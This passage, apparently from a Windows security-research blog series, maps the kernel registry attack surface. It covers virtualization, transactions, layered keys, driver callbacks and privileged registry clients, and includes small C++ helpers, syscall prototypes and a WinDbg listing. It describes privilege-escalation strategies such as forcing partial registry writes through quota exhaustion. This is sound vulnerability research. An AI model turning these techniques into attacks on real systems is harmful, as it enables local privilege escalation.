thinnest wrappers and closest in functionality to their corresponding syscalls on the kernel side. In the official Microsoft documentation, you'll also find many older/deprecated versions of these functions, which were available in early Windows versions and now exist solely for backward compatibility (e.g., RegOpenKey, RegEnumKey). Additionally, there are also helper functions that implement more complex logic on the user-mode side (e.g., RegDeleteTree, which recursively deletes an entire subtree of a given key), but they don't add anything in terms of the kernel attack surface.There are several operations natively supported by the kernel that do not have a user-mode equivalent, such as NtQueryOpenSubKeys or NtSetInformationKey. The only way to use these interfaces is to call their respective system calls directly, which is most easily achieved by calling their wrappers with the same name in the ntdll.dll library. Furthermore, even when a documented API function exists, it may not expose all the capabilities of its corresponding system call. For example, the RegQueryKeyInfo function returns some information about a key, but much more can be learned by using NtQueryKey directly with one of the supported information classes. Moreover, there is a group of syscalls that do require administrator rights (specifically SeBackupPrivilege, SeRestorePrivilege, or PreviousMode set to KernelMode). These syscalls are used either for registry management by the kernel or system services, or for purely administrative tasks (such as performing registry backups). They are not particularly interesting from a security research perspective, as they cannot be used to elevate privileges, but it is worth mentioning them by name:NtCompactKeysNtCompressKeyNtFreezeRegistryNtInitializeRegistryNtLockRegistryKeyNtQueryOpenSubKeysExNtReplaceKeyNtRestoreKeyNtSaveKeyNtSaveKeyExNtSaveMergedKeysNtThawRegistryNtUnloadKeyNtUnloadKey2NtUnloadKeyExIncorporating advanced features Despite the fact that most power users are familiar with the basic registry operations (e.g., from using Regedit.exe), there are still some modifiers that can change the behavior of these operations, thereby complicating their implementation and potentially leading to interesting bugs. To use these modifiers, additional steps are often required, such as enabling registry virtualization, creating a transaction, or loading a differencing hive. When this is done, the information about the special key properties are encoded within the internal kernel structures, and the key handle itself is almost indistinguishable from other handles as seen by the user-mode application. When operating on such advanced keys, the logic for their handling is executed in the standard registry syscalls transparently to the user. The diagram below illustrates the general, conceptual control flow in registry-related system calls: This is a very simplified outline of how registry syscalls work, but it shows that a function theoretically supporting one operation can actually hide many implementations that are dynamically chosen based on various factors. In terms of specifics, there are significant differences depending on the operation and whether it is a "read" or "write" one. For example, in "read" operations, the execution paths for transactional and non-transactional operations are typically combined into one that has built-in transaction support but can also operate without them. On the other hand, in "write" operations, normal and transactional operations are always performed differently, but there isn't much code dedicated to layered keys (except for the so-called key promotion operations), since when writing to a layered key, the state of keys lower on the stack is usually not as important. As for the "Internal operation handler" area marked within the large rectangle with the dotted line, these are internal functions responsible for the core logic of a specific operation, and whose names typically begin with "Cm" instead of "Nt". For example, for the NtDeleteKey syscall, the corresponding internal handler is CmDeleteKey, for NtQueryKey it is CmQueryKey, for NtEnumerateKey it is CmEnumerateKey, and so on. In the following sections, we will take a closer look at each of the possible complications.Predefined keys and symbolic links Predefined keys were deprecated in 2023, so I won't spend much time on them here. It's worth mentioning that on modern systems, it wasn't possible to create them in any way using the API, or even directly using syscalls. The only way to craft such a key in the registry was to create it in binary form in a controlled hive file and have it loaded via RegLoadAppKey or as a user hive. These keys had very strange semantics, both at the key node level (unusual encoding of _CM_KEY_NODE.ValueList) and at the kernel key body object level (non-standard value of _CM_KEY_BODY.Type). Due to the need to filter out these keys at an early stage of syscall execution, there are special helper functions whose purpose is to open the key by handle and verify whether it is or isn't a predefined handle (CmObReferenceObjectByHandle and CmObReferenceObjectByName). Consequently, hunting for bugs related to predefined handles involved verifying whether each syscall used the above wrappers correctly, and whether there was some other way to perform an operation on this type of key while bypassing the type check. As I have mentioned, this is now just a thing of the past, as predefined handles in input hives are no longer supported and therefore do not pose a security risk to the system. When it comes to symbolic links, this is a semi-documented feature that requires calling the RegCreateKeyEx function with the special REG_OPTION_CREATE_LINK flag to create them. Then, you need to set a value named "SymbolicLinkValue" and of type REG_LINK, which contains the target of the symlink as an absolute, internal registry path (\Registry\...) written using wide characters. From that point on, the link points to the specified path. However, it's important to remember that traversing symbolic links originating from non-system hives is heavily restricted: it can only occur within a single "trust class" (e.g., between the user hive and user classes hive of the same user). As a result, links located in app hives are never fully functional, because each app hive resides in its own isolated trust class, and they cannot reference themselves either, as references to paths starting with "\Registry\A" are blocked by the Windows kernel. As for auditing symbolic links, they are generally resolved during the opening/creation of a key. Therefore, the analysis mainly involves the CmpParseKey function and lower-level functions called within it, particularly CmpGetSymbolicLinkTarget, which is responsible for reading the target of a given symlink and searching for it in existing registry structures. Issues related to symlinks can also be found in registry callbacks registered by third-party drivers, especially those that handle the RegNtPostOpenKey/RegNtPostCreateKey and similar operations. Correctly handling "reparse" return values and the multiple call loops performed by the NT Object Manager is not an easy feat to achieve.Registry virtualization Registry virtualization, introduced in Windows Vista, ensures backward compatibility for older applications that assume administrative privileges when using the registry. This mechanism redirects references between HKLM\Software and HKU\_Classes\VirtualStore subkeys transparently, allowing programs to "think" they write to the system hive even though they don't have sufficient permissions for it. The virtualization logic, integrated into nearly every basic registry syscall, is mostly implemented by three functions: CmKeyBodyRemapToVirtualForEnum: Translates a real key inside a virtualized hive (HKLM\Software) to a virtual key inside the VirtualStore of the user classes hive during read-type operations. This is done to merge the properties of both keys into a single state that is then returned to the caller.CmKeyBodyRemapToVirtual: Translates a real key to its corresponding virtual key, and is used in the key deletion and value deletion operations. This is done to delete the replica of a given key in VirtualStore or one of its values, instead of its real instance in the global hive.CmKeyBodyReplicateToVirtual: Replicates the entire key structure that the caller wants to create in the virtualized hive, inside of the VirtualStore. All of the above functions have a complicated control flow, both in terms of low-level implementation (e.g., they implement various registry path conversions) and logically – they create new keys in the registry, merge the states of different keys into one, etc. As a result, it doesn't really come as a big surprise that the code has been affected by many vulnerabilities. Triggering virtualization doesn't require any special rights, but it does need a few conditions to be met: Virtualization must be specifically enabled for a given process. This is not the default behavior for 64-bit programs but can be easily enabled by calling the SetTokenInformation function with the TokenVirtualizationEnabled argument on the security token of the process.Depending on the desired behavior, the appropriate combination of VirtualSource/VirtualTarget/VirtualStore flags should be set in _CM_KEY_NODE.Flags. This can be achieved either through binary control over the hive or by setting it at runtime using the NtSetInformationKey call with the KeySetVirtualizationInformation argument.The REG_KEY_DONT_VIRTUALIZE flag must not be set in the _CM_KEY_NODE.VirtControlFlags field for a given key. This is usually not an issue, but if necessary, it can be adjusted either in the binary representation of the hive or using the NtSetInformationKey call with the KeyControlFlagsInformation argument.In specific cases, the source key must be located in a virtualizable hive. In such scenarios, the HKLM\Software\Microsoft\DRM key becomes very useful, as it meets this condition and has a permissive security descriptor that allows all users in the system to create subkeys within it. With regards to the first two points, many examples of virtualization-related bugs can be found in the Project Zero bug tracker. These reports include proof-of-concept code that correctly sets the appropriate flags. For simplicity, I will share that code here as well; the two C++ functions responsible for enabling virtualization for a given security token and registry key are shown below: BOOL EnableTokenVirtualization(HANDLE hToken, BOOL bEnabled) {   DWORD dwVirtualizationEnabled = bEnabled;   return SetTokenInformation(hToken,                              TokenVirtualizationEnabled,                              &dwVirtualizationEnabled,                              sizeof(dwVirtualizationEnabled)); } BOOL EnableKeyVirtualization(HKEY hKey,                              BOOL VirtualTarget,                              BOOL VirtualStore,                              BOOL VirtualSource) {   KEY_SET_VIRTUALIZATION_INFORMATION VirtInfo;   VirtInfo.VirtualTarget = VirtualTarget;   VirtInfo.VirtualStore = VirtualStore;   VirtInfo.VirtualSource = VirtualSource;   VirtInfo.Reserved = 0;   NTSTATUS Status = NtSetInformationKey(hKey,                                         KeySetVirtualizationInformation,                                         &VirtInfo,                                         sizeof(VirtInfo));   return NT_SUCCESS(Status); } And their example use: HANDLE hToken; HKEY hKey; // // Enable virtualization for the token. // if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {   printf("OpenProcessToken failed with error %u\n", GetLastError());   return 1; } EnableTokenVirtualization(hToken, TRUE); // // Enable virtualization for the key. // hKey = RegOpenKeyExW(...); EnableKeyVirtualization(hKey,                         /*VirtualTarget=*/TRUE,                         /*VirtualStore=*/ TRUE,                         /*VirtualSource=*/FALSE);Transactions There are two types of registry transactions: KTM and lightweight. The former are transactions implemented on top of the tm.sys (Transaction Manager) driver, and they try to provide certain guarantees of transactional atomicity both during system run time and even across reboots. The latter, as the name suggests, are lightweight transactions that exist only in memory and whose task is to provide an easy and quick way to ensure that a given set of registry operations is applied atomically. As potential attackers, there are three parts of the interface that we are interested in the most: creating a transaction object, rolling back a transaction, and committing a transaction. The functions responsible for all three actions in each type of transaction are shown in the table below: Operation KTM (API) KTM (system call) Lightweight (API) Lightweight (system call) Create transaction CreateTransaction NtCreateTransaction - NtCreateRegistryTransaction Rollback transaction RollbackTransaction NtRollbackTransaction - NtRollbackRegistryTransaction Commit transaction CommitTransaction NtCommitTransaction - NtCommitRegistryTransaction As we can see, the KTM has a public, documented API interface, which cannot be said for lightweight transactions that can only be used via syscalls. Their definitions, however, are not too difficult to reverse engineer, and they come down to the following prototypes: NTSTATUS NtCreateRegistryTransaction(PHANDLE OutputHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULONG Reserved); NTSTATUS NtRollbackRegistryTransaction(HANDLE Handle, ULONG Reserved); NTSTATUS NtCommitRegistryTransaction(HANDLE Handle, ULONG Reserved); Upon the creation of a transaction object, whether of type TmTransactionObjectType (KTM) or CmRegistryTransactionType (lightweight), its subsequent usage becomes straightforward. The transaction handle is passed to either the RegOpenKeyTransacted or the RegCreateKeyTransacted function, yielding a key handle. The key's internal properties, specifically the key body structure, will reflect its transactional nature. Operations on this key proceed identically to the non-transactional case, using the same functions. However, changes are temporarily confined to the transaction context, isolated from the global registry view. Upon the completion of all transactional operations, the user may elect either to discard the changes via a rollback, or apply them atomically through a commit. From the developer's perspective, this interface is undeniably convenient. From an attack surface perspective, there's a substantial amount of code underlying the transaction functionality. Firstly, the handler for each base operation includes code to verify that the key isn't locked by another transaction, to allocate and initialize a UoW (unit of work) object, and then write it to the internal structures that describe the transaction. Secondly, to maintain consistency with the new functionality, the existing non-transactional code must first abort all transactions associated with a given key before it can be modified. But that's not the end of the story. The commit process itself is also complicated, as it must cleverly circumvent various registry limitations resulting from its original design. In 2023, most of the code responsible for KTM transactions was removed as a result of CVE-2023-32019, but there is still a second engine that was initially responsible for lightweight transactions and now handles all of them. It consists of two stages: "Prepare" and "Commit". During the prepare stage, all steps that could potentially fail are performed, such as allocating all necessary cells in the target hive. Errors are allowed and correctly handled in the prepare stage, because the globally visible state of the registry does not change yet. This is followed by the commit stage, which is designed so that nothing can go wrong – it no longer performs any dynamic allocations or other complex operations, and its whole purpose is to update values in both the hive and the kernel descriptors so that transactional changes become globally visible. The internal prepare handlers for each individual operation have names starting with "CmpLightWeightPrepare" (e.g., CmpLightWeightPrepareAddKeyUoW), while the corresponding commit handlers start with "CmpLightWeightCommit" (e.g., CmpLightWeightCommitAddKeyUoW). These are the two main families of functions that are most interesting from a vulnerability research perspective. In addition to them, it is also worth analyzing the rollback functionality, which is used both when the rollback is requested directly by the user and when an error occurs in the prepare stage. This part is mainly handled by the CmpTransMgrFreeVolatileData function.Layered keys Layered keys are the latest major change of this type in the Windows Registry, introduced in 2016. They overturned many fundamental assumptions that had been in place until then. A given logical key no longer consists solely of one key node and a maximum of one active KCB, but of a whole stack of these objects: from the layer height of the given hive down to layer zero, which is the base hive. A key that has a key node may in practice be non-existent (if marked as a tombstone), and vice versa, a key without a key node may logically exist if there is an existing key with the same name lower in its stack. In short, this whole containerization mechanism has doubled the complexity of every single registry operation, because:Querying for information about a key has become more difficult, because instead of gathering information from just one key, it has to be potentially collected from many keys at once and combined into a coherent whole for the caller.Performing any "write" operations has become more difficult because before writing any information to the key at a given nesting level, you first need to make sure that the key and all its ancestors in a given hive exist, which is done in a complicated process called "key promotion".Deleting and renaming a key has become more difficult, because you always have to consider and correctly handle higher-level keys that rely on the one you are modifying. This is especially true for Merge-Unbacked keys, which do not have their own representation and only reflect the state of the keys at a lower level. This also applies to ordinary keys from hives under HKLM and HKU, which by themselves have nothing to do with differencing hives, but as an integral part of the registry hierarchy, they also have to correctly support this feature.Performing security access checks on a key has become more challenging due to the need to accurately pinpoint the relevant security descriptor on the key stack first. Overall, the layered keys mechanism is so complex that it could warrant an entire blog post (or several) on its own, so I won't be able to explain all of its aspects here. Nevertheless, its existence will quickly become clear to anyone who starts reversing the registry implementation. The code related to this functionality can be identified in many ways, for example: By references to functions that initialize the key node stack / KCB stack objects (i.e., CmpInitializeKeyNodeStack, CmpStartKcbStack, and CmpStartKcbStackForTopLayerKcb),By dedicated functions that implement a given operation specifically on layered keys that end with "LayeredKey" (e.g., CmDeleteLayeredKey, CmEnumerateValueFromLayeredKey, CmQueryLayeredKey), By references to the KCB.LayerHeight field, which is very often used to determine whether the code is dealing with a layered key (height greater than zero) or a base key (height equal to zero). I encourage those interested in further exploring this topic to read Microsoft's Containerized Configuration patent (US20170279678A1), the "Registry virtualization" section in Chapter 10 of Windows Internals (Part 2, 7th Edition), as well as my previous blog post #6, where I briefly described many internal structures related to layered keys. All of these references are great resources that can provide a good starting point for further analysis. When it comes to layered keys in the context of attack entry points, it's important to note that loading custom differencing hives in Windows is not straightforward. As I wrote in blog post #4, loading this type of hive is not possible at all through any standard NtLoadKey-family syscall. Instead, it is done by sending an undocumented IOCTL 0x220008 to \Device\VRegDriver, which then passes this request on to an internal kernel function named CmLoadDifferencingKey. Therefore, the first obstacle is that in order to use this IOCTL interface, one would have to reverse engineer the layout of its corresponding input structure. Fortunately, I have already done it and published it in the blog post under the VRP_LOAD_DIFFERENCING_HIVE_INPUT name. However, a second, much more pressing problem is that communicating with the VRegDriver requires administrative rights, so it can only be used for testing purposes, but not in practical privilege escalation attacks. So, what options are we left with? Firstly, there are potential scenarios where the exploit is packaged in a mechanism that legitimately uses differencing hives, e.g., an MSIX-packaged application running in an app silo, or a specially crafted Docker container running in a server silo. In such cases, we provide our own hives by design, which are then loaded on the victim’s system on our behalf when the malicious program or container is started. The second option is to simply ignore the inability to load our own hive and use one already present in the system. In a default Windows installation, many built-in applications use differencing hives, and the \Registry\WC key can be easily enumerated and opened without any problems (unlike \Registry\A). Therefore, if we launch a program running inside an app silo (e.g., Notepad) as a local user, we can then operate on the differencing hives loaded by it. This is exactly what I did in most of my proof-of-concept exploits related to this functionality. Of course, it is possible that a given bug will require full binary control over the differencing hive in order to trigger it, but this is a relatively rare case: of the 10 vulnerabilities I identified in this code, only two of them required such a high degree of control over the hive.Alternative registry attack targets The most crucial attack surface associated with the registry is obviously its implementation within the Windows kernel. However, other types of software interact with the registry in many ways and can be also prone to privilege escalation attacks through this mechanism. They are discussed in the following sections.Drivers implementing registry callbacks Another area where potential registry-related security vulnerabilities can be found is Registry Callbacks. This mechanism, first introduced in Windows XP and still present today, provides an interface for kernel drivers to log or interfere with registry operations in real-time. One of the most obvious uses for this functionality is antivirus software, which relies on registry monitoring. Microsoft, aware of this need but wanting to avoid direct syscall hooking by drivers, was compelled to provide developers with an official, documented API for this purpose. From a technical standpoint, callbacks can be registered using either the CmRegisterCallback function or its more modern version, CmRegisterCallbackEx. The documentation for these functions serves as a good starting point for exploring the mechanism, as it seamlessly leads to the documentation of the callback function itself, and from there to the documentation of all the structures that describe the individual operations. Generally speaking, callbacks can monitor virtually any type of registry operation, both before ("pre" callbacks) and after ("post" callbacks) it is performed. They can be used to inspect what is happening in the system and log the details of specific events of interest. Callbacks can also influence the outcome of an operation. In "pre" notifications, they can modify input data or completely take control of the operation and return arbitrary information to the caller while bypassing the standard operation logic. During "post" notification handling, it is possible to influence both the status returned to the user and the output data. Overall, depending on the amount and types of operations supported in a callback, a completely error-free implementation can be really difficult to write. It requires excellent knowledge of the inner workings of the registry, as well as a very thorough reading of the documentation related to callbacks. The contracts that exist between the Windows kernel and the callback code can be very complicated, so in addition to the sources mentioned above, it's also worth reading the entire separate series of seven articles detailing various callback considerations, titled Filtering Registry Calls. Here are some examples of things that can go wrong in the implementation of callbacks: Standard user-mode memory access bugs. As per the documentation (refer to the table at the bottom of the Remarks section), pointers to output data received in "post" type callbacks contain the original user-mode addresses passed to the syscall by the caller. This means that if the callback wants to reference this data in any way, the only guarantee it has is that these pointers have been previously probed. However, it is still important to access this memory within a try/except block and to avoid potential double-fetch vulnerabilities by always copying the data to a kernel-mode buffer first before operating on it.A somewhat related but higher-level issue is excessive trust in the output data structure within "post" callbacks. The problem is that some registry syscalls return data in a strictly structured way, and since the "post" callback executes before returning to user mode, it might seem safe to trust that the output data conforms to its documented format (if one wants to use or slightly modify it). An example of such a syscall is NtQueryKey, which returns a specific structure for each of the several possible information classes. In theory, it would appear that a malicious program has not yet had the opportunity to modify this data, and it should still be valid when the callback executes. In practice, however, this is not the case, because the output data has already been copied to user-mode, and there may be a parallel user thread modifying it concurrently. Therefore, it is very important that if one wants to use the output data in the "post" callback, they must first fully sanitize it, assuming that it may be completely arbitrary and is as untrusted as any other input data.Moving up another level, it's important to prevent confused deputy problems that exploit the fact that callback code runs with kernel privileges. For example, if a callback wanted to redirect access to certain registry paths to another location, and it used the ZwCreateKey call without the OBJ_FORCE_ACCESS_CHECK flag to do so, it would allow an attacker to create keys in locations where they normally wouldn't have access.Bugs in the emulation of certain operations in "pre"-type callbacks. If a callback decides to handle a given request on its own and signal this to the kernel by returning the STATUS_CALLBACK_BYPASS code, it is responsible for filling all important fields in the corresponding REG_XXX_KEY_INFORMATION structure so that, in accordance with the expected syscall behavior, the output data is correctly returned to the caller (source: "When a registry filtering driver's RegistryCallback routine receives a pre-notification [...]" and "Alternatively, if the driver changes a status code from failure to success, it might have to provide appropriate output parameters.").Bugs in "post"-type callbacks that change an operation's status from success to failure. If we want to block an operation after it has already been executed, we must remember that it has already occurred, with all its consequences and side effects. To successfully pretend that it did not succeed, we would have to reverse all its visible effects for the user and release the resources allocated for this purpose. For some operations, this is very difficult or practically impossible to do cleanly, so I would personally recommend only blocking operations at the "pre" stage and refraining from trying to influence their outcome at the "post" stage (source: "If the driver changes a status code from success to failure, it might have to deallocate objects that the configuration manager allocated.").Challenges presented by error handling within "post"-type callbacks. As per the documentation, the kernel only differentiates between a STATUS_CALLBACK_BYPASS return value and all others, which means that it doesn't really discern callback success or failure. This is somewhat logical since, at this stage, there isn't a good way to handle failures – the operation has already been performed. On the other hand, it may be highly unintuitive, as the Windows kernel idiom "if (!NT_SUCCESS(Status)) { return Status; }" becomes ineffective here. If an error is returned, it won't propagate to user mode, and will only cause premature callback exit, potentially leaving some important operations unfinished. To address this, you should design "post" callbacks to be inherently fail-safe (e.g., include no dynamic allocations), or if this isn't feasible, implement error handling cautiously, ensuring that minor operation failures don't compromise the callback's overall logical/security guarantees.Issues surrounding the use of a key object pointer passed to the callback, in one of a few specific scenarios where it can have a non-NULL value but not point to a valid key object. This topic is explored in a short article in Microsoft Learn: Invalid Key Object Pointers in Registry Notifications.Issues in open/create operation callbacks due to missing or incorrect handling of symbolic links and other redirections, which are characterized by the return values STATUS_REPARSE and STATUS_REPARSE_GLOBAL.Bugs that result from a lack of transaction support where it is needed. This could be an incorrect assumption that every operation performed on the registry is non-transactional and its effect is visible immediately, and not only after the transaction is committed. The API function that is used to retrieve the transaction associated with a given key (if it exists) during callback execution is CmGetBoundTransaction.Issues arising from using the older API version, CmCallbackGetKeyObjectID, instead of the newer CmCallbackGetKeyObjectIDEx. The older version has some inherent problems discussed in the documentation, such as returning an outdated key path if the key name has been changed by an NtRenameKey operation.Issues stemming from an overreliance on the CmCallbackGetKeyObjectID(Ex) function to retrieve a key's full path. A local user can cause these functions to deterministically fail by creating and operating on a key with a path length exceeding 65535 bytes (the maximum length of a string represented by the UNICODE_STRING structure). This can be achieved using the key renaming trick described in CVE-2022-37990, and results in the CmCallbackGetKeyObjectID(Ex) function returning the STATUS_INSUFFICIENT_RESOURCES error code. This is problematic because the documentation for this function does not mention this error code, and there is no way to defend against it from the callback's perspective. The only options are to avoid relying on retrieving the full key path altogether, or to implement a defensive fallback plan if this operation fails.Logical bugs arising from attempts to block access to certain registry keys by path, but neglecting the key rename operation, which can change the key's name dynamically and bypass potential filtering logic in the handling of the open/create operations. Notably, it's difficult to blame developers for such mistakes, as even the official documentation discourages handling NtRenameKey operations, citing its high complexity (quote: "Several registry system calls are not documented because they are rarely used [...]"). As we can see, developers using these types of callbacks can fall into many traps, and the probability of introducing a bug increases with the complexity of the callback's logic. As a security researcher, there are two approaches to enumerating this attack surface to find vulnerable callbacks: static and dynamic. The static approach involves searching the file system (especially C:\Windows\system32\drivers) for the "CmRegisterCallback" string, as every driver that registers a callback must refer to this function or its "Ex" equivalent. As for the dynamic approach, the descriptors of all callbacks in the system are linked together in a doubly-linked list that begins in the global nt!CallbackListHead object. Although the structure of these descriptors is undocumented, my analysis indicates that the pointer to the callback function is located at offset 0x28 in Windows 11. Therefore, all callbacks registered in the system at a given moment can be listed using the following WinDbg command: 0: kd> !list -x "dqs @$extret+0x28 L1" CallbackListHead fffff801`c42f6cd8  fffff801`c42f6cd0 nt!CmpPreloadedHivesList ffffdc88`d377e418  fffff801`56a48df0 WdFilter!MpRegCallback ffffdc88`d8610b38  fffff801`59747410 applockerfltr!SmpRegistryCallback ffffdc88`d363e118  fffff801`57a05dd0 UCPD+0x5dd0 ffffdc88`ed11d788  fffff801`c3c2ba50 nt!VrpRegistryCallback ffffdc88`d860c758  fffff801`597510c0 bfs!BfsRegistryCallback As shown, even on a clean Windows 11 system, the operating system and its drivers register a substantial number of callbacks. In the listing above, the first line of output can be ignored, as it refers to the nt!CallbackListHead object, which is the beginning of the list and not a real callback descriptor. The remaining functions are associated with the following modules: WdFilter!MpRegCallback: a callback registered by Windows Defender, the default antivirus engine running on Windows.applockerfltr!SmpRegistryCallback: a callback registered by the Smartlocker Filter Driver, which is one of the drivers that implement the AppLocker/SmartLocker functionality at the kernel level.UCPD+0x5dd0: a callback associated with the UCPD.sys driver, which expands to "User Choice Protection Driver". This is a module that prevents third-party software from modifying the default application settings for certain file types and protocols, such as web browsers and PDF readers. As we can infer from the format of this symbol and its unresolved name, Microsoft does not currently provide PDB debug symbols for the executable image, but some information online indicates that such symbols were once available for older builds of the driver.nt!VrpRegistryCallback: a callback implemented by the VRegDriver, which is part of the core Windows kernel executable image, ntoskrnl.exe. It plays a crucial role in the system, as it is responsible for redirecting key references to their counterparts within differencing hives for containerized processes. It is likely the most interesting and complex callback registered by default in Windows.bfs!BfsRegistryCallback: the callback is a component of the Brokering File System driver. It is primarily responsible for supporting secure file access for applications running in an isolated environment (AppContainers). However, it also has a relatively simple registry callback that supports key opening/creation operations. It is not entirely clear why the functionality wasn't simply incorporated into the VrpRegistryCallback, which serves a very similar purpose. In my research, I primarily focused on reviewing the callback invocations in individual registry operations (specifically calls to the CmpCallCallBacksEx function), and on the correctness of the VrpRegistryCallback function implementation. As a result, I discovered CVE-2023-38141 in the former area, and three further bugs in the VRegDriver (CVE-2023-38140, CVE-2023-36803 and CVE-2023-36576). These reports serve as a very good example of the many types of problems that can occur in registry callbacks.Privileged registry clients: programs and drivers The final attack target related to the registry are the highly privileged users of this interface, that is, user-mode processes running with administrator/system rights, and kernel drivers that operate on the registry. The registry is a shared resource by design, and apart from app hives mounted in the special \Registry\A key, every program in the system can refer to any active key as long as it has the appropriate permissions. And for a malicious user, this means that they can try to exploit weaknesses exhibited by other processes when interacting with the registry, and secondly, they can try to actively interfere with them. I can personally imagine two main types of issues related to incorrect use of the registry, and both of them are quite high-level by nature. The first concern is related to the fact that the registry, as a part of the NT Object Manager model, undergoes standard access control through security access checks. Each registry key is mandatorily assigned a specific security descriptor. Therefore, as the name implies, it is crucial for system security that each key's descriptor has the minimum permissions required for proper functionality, while aligning with the author's intended security model for the application. From a technical perspective, a specific security descriptor for a given key can be set either during its creation through the lpSecurityAttributes argument of RegCreateKeyExW, or separately by calling the RegSetKeySecurity API. If no descriptor is explicitly set, the key assumes a default descriptor based largely on the security settings of its parent key. This model makes sense from a practical standpoint. It allows most applications to avoid dealing with the complexities of custom security descriptors, while still maintaining a reasonable level of security, as high-level keys in Windows typically have well-configured security settings. Consider the well-known HKLM\Software tree, where Win32 applications have stored their global settings for many years. The assumption is that ordinary users have read access to the global configuration within that tree, but only administrators can write to it. If an installer or application creates a new subkey under HKLM\Software without explicitly setting a descriptor, it inherits the default security properties, which is sufficient in most cases. However, certain situations require extra care to properly secure registry keys. For example, if an application stores highly sensitive data (e.g., user passwords) in the registry, it is important to ensure that both read and write permissions are restricted to the smallest possible group of users (e.g., administrators only). Additionally, when assigning custom security descriptors to keys in global system hives, you should exercise caution to avoid inadvertently granting write permissions to all system users. Furthermore, if a user has KEY_CREATE_LINK access to a global key used by higher-privileged processes, they can create a symbolic link within it, potentially resulting in a "confused deputy" problem and the ability to create registry keys under any path. In summary, for developers creating high-privilege code on Windows and utilizing the registry, it is essential to carefully handle the security descriptors of the keys they create and operate on. From a security researcher's perspective, it could be useful to develop tooling to list all keys that allow specific access types to particular groups in the system and run it periodically on different Windows versions and configurations. This approach can lead to some very easy bug discoveries, as it doesn't require any time spent on reverse engineering or code auditing. The second type of issue is more subtle and arises because a single "configuration unit" in the registry sometimes consists of multiple elements (keys, values) and must be modified atomically to prevent an inconsistent state and potential vulnerabilities.  For such cases, there is support for transactions in the registry. If a given process manages a configuration that is critical to system security and in which different elements must always be consistent with each other, then making use of the Transacted Registry (TxR) is practically mandatory. A significantly worse, though somewhat acceptable solution may be to implement a custom rollback logic, i.e., in the event of a failure of some individual operation, manually reversing the changes that have been applied so far. The worst case scenario is when a privileged program does not realize the seriousness of introducing partial changes to the registry, and implements its logic in a way typical of using the API in a best-effort manner, i.e.: calling Win32 functions as long as they succeed, and when any of them returns an error, then simply passing it up to the caller without any additional cleanup. Let's consider this bug class on the example of a hypothetical service that, through some local inter-process communication interface, allows users to register applications for startup. It creates a key structure under the HKLM\Software\CustomAutostart\ path, and for each such key it stores two values: the command line to run during system startup ("CommandLine"), and the username with whose privileges to run it ("UserName"). If the username value does not exist, it implicitly assumes that the program should start with system rights. Of course, the example service intends to be secure, so it only allows setting the username to the one corresponding to the security token of the requesting process. Operations on the registry take place in the following order: Create a new key named HKLM\Software\CustomAutostart\,Set the "CommandLine" value to the string provided by the client,Set the "UserName" value to the string provided by the client. The issue with this logic is that it's not transactional – if an error occurs, the execution simply aborts, leaving the partial state behind. For example, if operation #3 fails for any reason, an entry will be added to the autostart indicating that a controlled path should be launched with system rights. This directly leads to privilege escalation and was certainly not the developer's intention. One might wonder why any of these operations would fail, especially in a way controlled by an attacker. The answer is simple and was explained in the "Susceptibility to mishandling OOM conditions" section. A local attacker has at least two ways of influencing the success or failure of registry operations in the system: by filling the space of the hive they want to attack (if they have write access to at least one of its keys) or by occupying the global registry quota in memory, represented by the global nt!CmpGlobalQuota variable. Unfortunately, finding such vulnerabilities is more complicated than simply scanning the entire registry for overly permissive security descriptors. It requires identifying candidates of registry operations in the system that have appropriate characteristics (high privilege process, lack of transactionality, sensitivity to a partial/incomplete state), and then potentially reverse-engineering the specific software to get a deeper understanding of how it interacts with the registry. Tools like Process Monitor may come in handy at least in the first part of the process. One example of a vulnerability related to the incorrect guarantee of atomicity of system-critical structures is CVE-2024-26181. As a result of exhausting the global registry quota, it could lead to permanent damage to the HKLM\SAM hive, which stores particularly important information about users in the system, their passwords, group memberships, etc.Vulnerability primitives In this chapter, we will focus on classifying registry vulnerabilities based on the primitives they offer, and briefly discuss their practical consequences and potential exploitation methods.Pool memory corruption Pool memory corruption is probably the most common type of low-level vulnerability in the Windows kernel. In the context of the registry, this bug class is somewhat rarer than in other ring-0 components, but it certainly still occurs and is entirely possible. It manifests in its most "pure" form when the corruption happens within an auxiliary object that is temporarily allocated on the pools to implement a specific operation. One such example case is a report concerning three vulnerabilities—CVE-2022-37990, CVE-2022-38038, and CVE-2022-38039—all stemming from a fairly classic 16-bit integer overflow when calculating the length of a dynamically allocated buffer. Another example is CVE-2023-38154, where the cause of the buffer overflow was slightly more intricate and originated from a lack of error handling in one of the functions responsible for recovering the hive state from LOG files. The second type of pool memory corruption that can occur in the registry is problems managing long-lived objects that are used to cache some information from the hive mapping in more readily accessible pool memory — such as those described in post #6. In this case, we are usually dealing with UAF-type conditions, like releasing an object while there are still some active references to it. If I had to point to one object that could be most prone to this type of bug, it would probably be the Key Control Block, which is reference counted, used by the implementation of almost every registry syscall, and for which there are some very strong invariants critical for memory safety (e.g., the existence of only one KCB for a particular key in the global KCB tree). One issue related to KCBs was CVE-2022-44683, which resulted from incorrect handling of predefined keys in the NtNotifyChangeMultipleKeys system call. Another, slightly different category of UAFs on pools are situations in which this type of condition is not a direct consequence of a vulnerability, but more of a side effect. Let's take security descriptors as an example: they are located in the hive space, but the kernel also maintains a cache reflecting the state of these descriptors on the kernel pools (in _CMHIVE.SecurityCache and related fields). Therefore, if for some reason a security descriptor in the hive is freed prematurely, this problem will also be automatically reflected in the cache, and some keys may start to have a dangling KCB.CachedSecurity pointer set to the released object. I have taken advantage of this fact many times in my reports to Microsoft, because it was very useful for reliably triggering crashes. While generating a bugcheck based on the UAF of the _CM_KEY_SECURITY structure in the hive is possible, it is much more convoluted than simply turning on the Special Pool mechanism and making the kernel refer to the cached copy of the security descriptor (a few examples: CVE-2023-23421, CVE-2023-35382, CVE-2023-38139). In some cases, exploiting memory corruption on pools may also offer some advantages over exploiting hive-based memory corruption, so it is definitely worth remembering this behavior for the future. When it comes to the strictly technical aspects of kernel pool exploitation, I won't delve into it too deeply here. I didn't specifically focus on it in my research, and there aren't many interesting registry-specific details to mention in this context. If you are interested to learn more about this topic, please refer to the resources available online.Hive memory corruption The second type of memory corruption encountered in the registry is hive-based memory corruption. This class of bugs is unique to the registry and is based on the fact that data stored in hives serves a dual role. It stores information persistently on disk, but it also works as the representation of the hive in memory in the exact same form. The data is then operated on using C code through pointers, helper functions like memcpy, and so on. Given all this, it doesn't come as a surprise that classic vulnerabilities such as buffer overflows or use-after-free can also 